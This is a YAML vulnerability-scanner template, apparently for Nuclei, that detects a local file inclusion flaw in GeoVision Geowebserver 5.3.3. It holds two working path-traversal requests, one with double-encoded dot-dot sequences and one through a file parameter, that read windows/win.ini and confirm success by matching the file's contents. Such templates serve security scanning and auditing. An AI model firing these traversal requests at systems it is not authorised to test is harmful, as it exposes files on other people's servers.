id: geowebserver-lfi

info:
  name: GeoVision Geowebserver 5.3.3 - LFI
  author: madrobot
  severity: high
  description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files.
  reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
  tags: geowebserver,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini"
      - "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
        part: body

      - type: status
        status:
          - 200